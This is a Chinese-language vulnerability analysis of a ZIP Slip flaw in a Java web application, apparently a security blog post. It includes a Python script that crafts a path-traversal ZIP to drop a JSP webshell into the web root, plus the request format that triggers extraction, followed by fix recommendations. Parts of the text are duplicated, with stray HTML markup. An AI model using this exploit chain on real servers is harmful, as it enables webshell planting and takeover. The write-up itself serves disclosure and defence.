突破文件后缀限制实现任意文件上传漏洞分析与利用<\/h1>

0x00 漏洞概述<\/h2>
本漏洞存在于一个基于Java的Web应用中，通过精心构造的ZIP文件（利用ZIP Slip技术）和特定的API调用链，可以绕过文件上传的后缀限制，最终实现将恶意文件（如JSP Webshell）上传到Web服务器目录。<\/p>

0x01 漏洞发现过程<\/h2>

初始发现<\/h3>

系统存在一个上传点，允许上传ZIP文件<\/li>
上传功能有白名单过滤，仅允许特定类型文件（如ZIP）<\/li>

需要寻找系统中可控的解压点来利用ZIP Slip技术<\/li> <\/ul>

关键代码分析<\/h3>

在web.xml<\/code>中发现一个与上传相关的servlet，其uploadMediaFile<\/code>方法包含解压操作：<\/p>

try<\/span> {<\/span>
<\/span><\/span>    var16 =<\/span> ",jsp,jspx,bat,exe,jsf,jspf,server,setup,sql,sqlpage,tag,tagf,tagx,class,java,cmd,shs,msi,asp,aspx,net,"<\/span>;<\/span>
<\/span><\/span>    var3 =<\/span> new<\/span> FileInputStream(<\/span>new<\/span> File(<\/span>var7 +<\/span> var6 +<\/span> var1 +<\/span> var2));<\/span>
<\/span><\/span>    var15 =<\/span> new<\/span> ZipInputStream((<\/span>InputStream)<\/span>var3);<\/span>
<\/span><\/span>    ZipEntry var17 =<\/span> null<\/span>;<\/span>
<\/span><\/span>    while<\/span> ((<\/span>var17 =<\/span> var15.<\/span>getNextEntry<\/span>())<\/span> !=<\/span> null<\/span>)<\/span> {<\/span>
<\/span><\/span>        if<\/span> (!<\/span>var17.<\/span>isDirectory<\/span>())<\/span> {<\/span>
<\/span><\/span>            var18 =<\/span> var17.<\/span>getName<\/span>();<\/span>
<\/span><\/span>            var19 =<\/span> var18.<\/span>substring<\/span>(<\/span>var18.<\/span>indexOf<\/span>(<\/span>"."<\/span>));<\/span>
<\/span><\/span>            if<\/span> (<\/span>var16.<\/span>indexOf<\/span>(<\/span>","<\/span> +<\/span> var19.<\/span>toLowerCase<\/span>()<\/span> +<\/span> ","<\/span>)<\/span> ><\/span> -<\/span>1<\/span> ||<\/span> 
<\/span><\/span>                var16.<\/span>indexOf<\/span>(<\/span>","<\/span> +<\/span> var19.<\/span>toLowerCase<\/span>().<\/span>substring<\/span>(<\/span>1<\/span>)<\/span> +<\/span> ","<\/span>)<\/span> ><\/span> -<\/span>1<\/span>)<\/span> {<\/span>
<\/span><\/span>                \/\/ 黑名单后缀检测，阻止解压
<\/span><\/span><\/span><\/span>                break<\/span>;<\/span>
<\/span><\/span>            }<\/span>
<\/span><\/span>            \/\/ 其他处理逻辑...
<\/span><\/span><\/span><\/span>        }<\/span>
<\/span><\/span>    }<\/span>
<\/span><\/span>}<\/span> catch<\/span> (<\/span>IOException var44)<\/span> {<\/span>
<\/span><\/span>    \/\/ 异常处理...
<\/span><\/span><\/span><\/span>}<\/span>
<\/span><\/span><\/code><\/pre>绕过思路<\/h3>
虽然上述代码有黑名单检测，但系统中还存在其他解压点：<\/p>

使用jar-analyzer<\/code>工具搜索com.xxx.xxx.zip.ZipEntry<\/code>的getName<\/code>方法调用<\/li>
发现savexxxxTrans<\/code>类中的unZip()<\/code>方法存在潜在漏洞<\/li>
<\/ol>
0x02 漏洞利用链分析<\/h2>
关键调用链<\/h3>


AjaxController#A()<\/strong> - 入口点<\/p>

处理HTTP请求<\/li>
构造hashmap存储请求参数<\/li>
调用FrameCmd#execute()<\/code><\/li>
<\/ul>
<\/li>

FrameCmd#execute()<\/strong><\/p>

调用MsgRouter#execute()<\/code><\/li>
<\/ul>
<\/li>

MsgRouter#execute()<\/strong><\/p>

调用WFMapping#init()<\/code>加载配置<\/li>
通过反射调用对应类的execute<\/code>方法<\/li>
<\/ul>
<\/li>

savexxTrans#execute()<\/strong><\/p>

从hashmap获取r5100<\/code>和newpath<\/code>参数<\/li>
调用isZip<\/code>方法<\/li>
最终进入unZip<\/code>方法解压指定ZIP文件<\/li>
<\/ul>
<\/li>
<\/ol>
参数控制<\/h3>

newPath<\/code>参数控制ZIP文件路径<\/li>
r5100<\/code>参数作为辅助参数<\/li>
这些参数通过HTTP请求中的__XML<\/code>变量传递<\/li>
<\/ul>
0x03 漏洞利用步骤<\/h2>
1. 构造恶意ZIP文件<\/h3>
使用Python脚本创建包含路径遍历的ZIP文件：<\/p>
import<\/span> zipfile
<\/span><\/span>
<\/span><\/span>if<\/span> __name__ ==<\/span> "__main__"<\/span>:
<\/span><\/span>    try<\/span>:
<\/span><\/span>        zipFile =<\/span> zipfile.<\/span>ZipFile("poc1.zip"<\/span>, "a"<\/span>, zipfile.<\/span>ZIP_DEFLATED)
<\/span><\/span>        info =<\/span> zipfile.<\/span>ZipInfo("poc1.zip"<\/span>)
<\/span><\/span>        zipFile.<\/span>write(".\/1.jsp"<\/span>, "..\/..\/webapps\/xxx\/2.jsp"<\/span>, zipfile.<\/span>ZIP_DEFLATED)
<\/span><\/span>        zipFile.<\/span>close()
<\/span><\/span>    except<\/span> IOError<\/span> as<\/span> e:
<\/span><\/span>        raise<\/span> e
<\/span><\/span><\/code><\/pre>2. 上传ZIP文件<\/h3>
通过系统上传接口上传构造的ZIP文件，并获取文件存储路径。<\/p>
3. 构造攻击请求<\/h3>
构造包含以下内容的请求：<\/p>
{
<\/span><\/span>    "__xml"<\/span>: {
<\/span><\/span>        "functionId"<\/span>: "xxxxx0098"<\/span>,
<\/span><\/span>        "r5100"<\/span>: "123"<\/span>,
<\/span><\/span>        "newPath"<\/span>: "加密后的文件路径"<\/span>
<\/span><\/span>    }
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>注意：<\/p>

newPath<\/code>需要与上传接口返回的fullpath<\/code>解密结果一致<\/li>
需要对__xml<\/code>值进行AES加密（当type<\/code>为extTrans<\/code>时会自动解密）<\/li>
<\/ul>
4. 发送攻击请求<\/h3>
登录系统后发送构造的请求，触发解压操作。<\/p>
0x04 漏洞修复建议<\/h2>


解压安全<\/strong><\/p>

对解压出的文件路径进行规范化并验证<\/li>
禁止路径中包含..<\/code>等遍历字符<\/li>
限制解压目录为指定安全目录<\/li>
<\/ul>
<\/li>

文件上传<\/strong><\/p>

加强上传文件类型检查<\/li>
对上传文件内容进行扫描<\/li>
<\/ul>
<\/li>

权限控制<\/strong><\/p>

确保敏感操作需要足够权限<\/li>
加强API访问控制<\/li>
<\/ul>
<\/li>

输入验证<\/strong><\/p>

对所有输入参数进行严格验证<\/li>
避免直接使用用户输入构造文件路径<\/li>
<\/ul>
<\/li>
<\/ol>
0x05 总结<\/h2>
本漏洞利用链展示了如何通过：<\/p>

构造恶意ZIP文件<\/li>
寻找系统中不安全的解压点<\/li>
通过API调用链触发解压操作<\/li>
利用ZIP Slip技术实现任意文件上传<\/li>
<\/ol>
这种攻击方式在具有文件上传和解压功能的系统中较为常见，开发人员应特别注意文件操作的安全性。<\/p>

突破文件后缀限制实现任意文件上传漏洞分析与利用<\/h1>

0x00 漏洞概述<\/h2> 本漏洞存在于一个基于Java的Web应用中，通过精心构造的ZIP文件（利用ZIP Slip技术）和特定的API调用链，可以绕过文件上传的后缀限制，最终实现将恶意文件（如JSP Webshell）上传到Web服务器目录。<\/p>

0x01 漏洞发现过程<\/h2>

0x02 漏洞利用链分析<\/h2>

0x03 漏洞利用步骤<\/h2>

2. 上传ZIP文件<\/h3> 通过系统上传接口上传构造的ZIP文件，并获取文件存储路径。<\/p>

4. 发送攻击请求<\/h3> 登录系统后发送构造的请求，触发解压操作。<\/p>

0x00 漏洞概述<\/h2>
本漏洞存在于一个基于Java的Web应用中，通过精心构造的ZIP文件（利用ZIP Slip技术）和特定的API调用链，可以绕过文件上传的后缀限制，最终实现将恶意文件（如JSP Webshell）上传到Web服务器目录。<\/p>

2. 上传ZIP文件<\/h3>
通过系统上传接口上传构造的ZIP文件，并获取文件存储路径。<\/p>

4. 发送攻击请求<\/h3>
登录系统后发送构造的请求，触发解压操作。<\/p>